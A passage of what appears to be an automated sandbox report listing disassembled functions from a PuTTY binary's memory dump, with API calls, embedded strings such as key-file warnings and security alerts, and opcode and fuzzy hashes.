                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: FeaturePalettePresentProcessorSelect
                    • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c
                    • API String ID: 1536087120-2276619470
                    • Opcode ID: 95e466116e6e5a52a0fbd72447506106a748f73e4f158cd86dd7d628bde6a051
                    • Instruction ID: 7e2adc35723b4779cfe0a611516ff8990b44422fbfc4efa23e65de47723669c1
                    • Opcode Fuzzy Hash: 95e466116e6e5a52a0fbd72447506106a748f73e4f158cd86dd7d628bde6a051
                    • Instruction Fuzzy Hash: B8F0E572A00212ABD3211BA8BC0AFEA32E9DB89B41F1D0231B942E7594CE758C418620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • %s Key File Warning, xrefs: 00BCEE29
                    • You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00BCEE19
                    • PuTTY, xrefs: 00BCEE18, 00BCEE28
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Key File Warning$PuTTY$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
                    • API String ID: 2030045667-626526669
                    • Opcode ID: 89c884128fdd9ae593b0ce774b53ededab4b419da6a00cab49aa8fb5d0b04d52
                    • Instruction ID: af5ec24200c34e235c6e17d3bb306511fdfa42b7f583be2b302f1c721483d5cc
                    • Opcode Fuzzy Hash: 89c884128fdd9ae593b0ce774b53ededab4b419da6a00cab49aa8fb5d0b04d52
                    • Instruction Fuzzy Hash: 26E04FF39115903AE21132663C0FF6F2998CBD6B65F0900B4F80D66242FA421909C6B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C00A4F
                    • __aulldiv.LIBCMT ref: 00C00A73
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C00ACE
                    • __aulldiv.LIBCMT ref: 00C00AF1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Time$File$__aulldiv$LocalSystem
                    • String ID:
                    • API String ID: 1236384784-0
                    • Opcode ID: b81faf86312b699eb9a85f1f6321cb5ee9c952ee34c8f0db36bdd3a5e9e890ba
                    • Instruction ID: 940c5dd92ded79a47021010b5ec8de44edd19345130e679771c72a6bdd788798
                    • Opcode Fuzzy Hash: b81faf86312b699eb9a85f1f6321cb5ee9c952ee34c8f0db36bdd3a5e9e890ba
                    • Instruction Fuzzy Hash: 5E6138716043059FCB14CF28C840B9AB7E5FF89718F258A2DF99997390D771E905CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bfaff37bfcf1d63ae8e95d46bf247ac581743cf82fd98465f35e36bff3d38978
                    • Instruction ID: f2fa8c155f819cd995d344e0ab626bbb715f769cc9bc0647db0a71662430eee8
                    • Opcode Fuzzy Hash: bfaff37bfcf1d63ae8e95d46bf247ac581743cf82fd98465f35e36bff3d38978
                    • Instruction Fuzzy Hash: 6E411EB6A00704AFD7249F38CCC1B6ABBE9EB88711F10452AF415DB6C1D7B19984D794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Color
                    • String ID:
                    • API String ID: 2811717613-0
                    • Opcode ID: b28e4fb8443d4cb1a1c5983325451d10bfe05512188c912ecbed057124660a7a
                    • Instruction ID: cbb175ca1f0d32520a7bfb8464b6710ca2ded69358a5a39bc233b33d2fc76e48
                    • Opcode Fuzzy Hash: b28e4fb8443d4cb1a1c5983325451d10bfe05512188c912ecbed057124660a7a
                    • Instruction Fuzzy Hash: B541956501D3D0AED301AF6880452AFBFE4AFA5600F45CD8EF4D987352D6B4C584DBA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C69A7A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C6EF79,?,00000000,-00000008), ref: 00C69B26
                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00C68E50
                    • __dosmaperr.LIBCMT ref: 00C68E57
                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C68E91
                    • __dosmaperr.LIBCMT ref: 00C68E98
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: b3f040115bc1ca3dfeca7c5213ceacd5300fafcc04768aa4bfb70776bcd53745
                    • Instruction ID: f7a2171ae5e2f79d39abcc79bebc587a27c663c0b1a08e05c5c2cc20d7bd87a6
                    • Opcode Fuzzy Hash: b3f040115bc1ca3dfeca7c5213ceacd5300fafcc04768aa4bfb70776bcd53745
                    • Instruction Fuzzy Hash: 8D21F239600605AFCB30AFA2CCC096BB7A9FF413643108619F925D7200DF32ED4997A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000), ref: 00C74582
                    • GetLastError.KERNEL32(?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000,00000000,?,00C6B324,?), ref: 00C7458E
                      • Part of subcall function 00C745DF: CloseHandle.KERNEL32(FFFFFFFE,00C7459E,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000,00000000), ref: 00C745EF
                    • ___initconout.LIBCMT ref: 00C7459E
                      • Part of subcall function 00C745C0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C7455C,00C72BE2,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000), ref: 00C745D3
                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C72BF5,00000000,00000001,00000000,00000000,?,00C6B9D9,00000000,00000000,00000000,00000000), ref: 00C745B3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 411618e75a99dd4a3462b7a2b41e21189b464473b2b6f60c8af5806d19813af3
                    • Instruction ID: b2705a146e87c8d270326e82428d02a605423ba1a42c172593ff2421b72627ab
                    • Opcode Fuzzy Hash: 411618e75a99dd4a3462b7a2b41e21189b464473b2b6f60c8af5806d19813af3
                    • Instruction Fuzzy Hash: 2CF01C36000225BBCF661FA1EC04B9E3F66FB493A5F018111FA1E96520CB32C920EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • client subnegotiation: SB TTYPE IS %s, xrefs: 00BDB35F
                    • server subnegotiation: SB TTYPE SEND, xrefs: 00BDB349
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
                    • API String ID: 0-571888287
                    • Opcode ID: d94ec952149401da1c4f02b196c7b9a86e9fabf6e2d9f3511832221326fe9ce3
                    • Instruction ID: 58063697f5e8cce4a6d846fe7a06ce12336940e2531cca60fdeb892c24f2ef22
                    • Opcode Fuzzy Hash: d94ec952149401da1c4f02b196c7b9a86e9fabf6e2d9f3511832221326fe9ce3
                    • Instruction Fuzzy Hash: CCB1F170608345DFD7148F28C885F2AFBE1EB85314F6486AAE49A8B3D2E331D845D792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 00BEE490
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/unicode.c$p - mbstr < mblen
                    • API String ID: 626452242-3899250090
                    • Opcode ID: aacf1377c28fd3d4107adff29c6c0e5eb22c3c998ef898bed94baa0cc2c99916
                    • Instruction ID: 90a200a60440b24372d896d0adbc8f5fcf4d15ceb82567c0291d9bd3fe98658b
                    • Opcode Fuzzy Hash: aacf1377c28fd3d4107adff29c6c0e5eb22c3c998ef898bed94baa0cc2c99916
                    • Instruction Fuzzy Hash: 6D51E3306083819BD730DF15C885B6E77E0EF98308F1489ACF9999B381E771E944C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • false && "unhandled node type in exprnode_free", xrefs: 00C10EEE
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/cert-expr.c, xrefs: 00C10E79, 00C10EE9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/cert-expr.c$false && "unhandled node type in exprnode_free"
                    • API String ID: 4218353326-1224637189
                    • Opcode ID: a4bf35efa958c1c757a9673fd8f8aec824a88318cbfbfe1d0373ac0a3d49bc55
                    • Instruction ID: 76b7d54c088ec6557e04df7fc77971713c35f894df0665c7246f3630eabc27f4
                    • Opcode Fuzzy Hash: a4bf35efa958c1c757a9673fd8f8aec824a88318cbfbfe1d0373ac0a3d49bc55
                    • Instruction Fuzzy Hash: 79316972A006105BE7106A29EC526AEB3D6DF82330F19462EEA9587390E7719DC5E782
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BD4F35
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BD4F44
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: Event Log: %s
                    • API String ID: 601868998-1617424366
                    • Opcode ID: 5d46599007cbdb8b839625286ba298a48db9e5b7f6dc4e35b8dce10656a9c106
                    • Instruction ID: 70d01b2faf804e0d024b35293282374297e3a8d196ebd5353a74ef9cf049d036
                    • Opcode Fuzzy Hash: 5d46599007cbdb8b839625286ba298a48db9e5b7f6dc4e35b8dce10656a9c106
                    • Instruction Fuzzy Hash: 8E212875A005406FD6305724EC86B2AB7D5EF0731AF1801A6F80D86766F736A898D6E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BD30C4
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3087
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD308C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    • Opcode ID: 59195d569ba1c32ccc11e38a13b2db151cd88aa795f4624426734cbf09a9cc5b
                    • Instruction ID: 09fb3d868498db4371e674257ea39dd6c7ed8fb00022a77f7444ab24ba3eaeaf
                    • Opcode Fuzzy Hash: 59195d569ba1c32ccc11e38a13b2db151cd88aa795f4624426734cbf09a9cc5b
                    • Instruction Fuzzy Hash: BE116670644304AFE7208B04DC95F36B3D9EF49B18F0400BEF50A873A2EB21AD40C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • c && c->ctrl->type == CTRL_RADIO, xrefs: 00BD2C83
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2C7E
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonCheckRadio
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO
                    • API String ID: 2493629399-1269695261
                    • Opcode ID: 2de3fe323635c2ab1d6cdd6112428f3621d814688d19a2b0be80f7d2c481201c
                    • Instruction ID: b67a6f3c1dd354732d1ddcbdf3cba0a3e8feca4a2d7a5e4c55a45d35b0405293
                    • Opcode Fuzzy Hash: 2de3fe323635c2ab1d6cdd6112428f3621d814688d19a2b0be80f7d2c481201c
                    • Instruction Fuzzy Hash: 53115B72A14212AFC620CF54D9C1E5AB7E8FB69708F0945AAE90497221E372BC15CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BreakClearCloseCommHandle
                    • String ID: Error writing to serial device
                    • API String ID: 2685284230-3232346394
                    • Opcode ID: 481f1a637c408009e5983e7fb0f26c3585585c4660af05b9099bcafcb1da41a7
                    • Instruction ID: f2a88616b0eb9f785c26fdb3ed295c5ebba82c87255dfd7d997fa8742eb2de4c
                    • Opcode Fuzzy Hash: 481f1a637c408009e5983e7fb0f26c3585585c4660af05b9099bcafcb1da41a7
                    • Instruction Fuzzy Hash: 2E1163B05007019FDB20DF24EC4AB17BBE4EF15318F144A69F89A87791E731E994DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CheckDlgButton.USER32(?,?,00000000), ref: 00BD2DF9
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2DDE
                    • c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BD2DE3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonCheck
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                    • API String ID: 83588225-3149189057
                    • Opcode ID: 69d72465aa0b08f746825ec0405ad5d43f7ed4e4ae9def6184daa7fd1f71ba12
                    • Instruction ID: 64c3e516db30ef879daedcea9e27ddda49bb4695ce9047d487831a24918032b8
                    • Opcode Fuzzy Hash: 69d72465aa0b08f746825ec0405ad5d43f7ed4e4ae9def6184daa7fd1f71ba12
                    • Instruction Fuzzy Hash: 4F01FE35549382AFD2119F64EC41F66FBE5EF66709F0500B2F84597311E371AC14D7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDlgButtonChecked.USER32(?,?), ref: 00BD2E79
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2E62
                    • c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BD2E67
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonChecked
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                    • API String ID: 1719414920-3149189057
                    • Opcode ID: 1223b7c89a8bbe874b5110ac2549a6ef5f7f702ef4346e8a35aba344ce1a2d2f
                    • Instruction ID: 5803e54a9c93dcc57e69afbaa9c3e3b05c74f505b12bc886470b70d3c53bea5d
                    • Opcode Fuzzy Hash: 1223b7c89a8bbe874b5110ac2549a6ef5f7f702ef4346e8a35aba344ce1a2d2f
                    • Instruction Fuzzy Hash: 80F0F636640345EFD210AF64ED46F26F7E9EB59B09F0501A2F40893620F721AC54D7D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowCursor.USER32(00000001,?,?,?,?,00000000,00000000), ref: 00BB6276
                    • MessageBoxA.USER32 ref: 00BB62A2
                    Strings
                    Similarity
                    • API ID: CursorMessageShow
                    • String ID: %s Error
                    • API String ID: 2689832819-1420171443
                    • Opcode ID: 70e9faa08a08d0b081c6738fded57ad640fbe64a7bb15494afb0ac902cb45c5d
                    • Instruction ID: 893bdf913e6a17d4b4cda397280f95cf3106d68cb3307eb5f5a7983f5aa867ab
                    • Opcode Fuzzy Hash: 70e9faa08a08d0b081c6738fded57ad640fbe64a7bb15494afb0ac902cb45c5d
                    • Instruction Fuzzy Hash: AA01D4F59102406FEB057B21FC0BF6F3BA4EB55354F040128F84B16292EA625858DBA3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • %s Internal Error, xrefs: 00BBB122
                    • Unsupported protocol number found, xrefs: 00BBB134
                    Similarity
                    • API ID: Message
                    • String ID: %s Internal Error$Unsupported protocol number found
                    • API String ID: 2030045667-184558026
                    • Opcode ID: 6c0e1101e6d1a6fbc7981a808606b5febdbdb7495fde1e4b193c2fc320212aec
                    • Instruction ID: 3ba1d8563876d3f276f3d2ca8a180790ffa140e1e5cd291426de6928f9e2aa48
                    • Opcode Fuzzy Hash: 6c0e1101e6d1a6fbc7981a808606b5febdbdb7495fde1e4b193c2fc320212aec
                    • Instruction Fuzzy Hash: AEE02BE19542003BEB1133647C0FF7A31D88B10335F080070FD09691E3E7E29844C1A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?, xrefs: 00BCEAF0
                    • %s Security Alert, xrefs: 00BCEB05
                    Similarity
                    • API ID: Message
                    • String ID: %s Security Alert$The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?
                    • API String ID: 2030045667-1123452757
                    • Opcode ID: d21c44b4b4fa162d9ac4f31c11d89e2928b018f403373343e9cf04ba6eec99fe
                    • Instruction ID: 00164c2f857276a8240e7ef86aff7bc49a596c0ca8b2ee14d0f66b324fc7d29e
                    • Opcode Fuzzy Hash: d21c44b4b4fa162d9ac4f31c11d89e2928b018f403373343e9cf04ba6eec99fe
                    • Instruction Fuzzy Hash: E6F090B76443406BE7002AB1BC0AF2B76D8EB99769F040478F54DE6242E66A9918C763
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • %s Security Alert, xrefs: 00BCEB85
                    • The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne, xrefs: 00BCEB70
                    Similarity
                    • API ID: Message
                    • String ID: %s Security Alert$The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne
                    • API String ID: 2030045667-3125611854
                    • Opcode ID: 77a0d4288ce43f6424c86afdb207ada4fa06927fe978a950bc793b7a921af69b
                    • Instruction ID: be0272a89fa519309055d41c846bae9ed4198cdbf96915dc6564bd58d0f24542
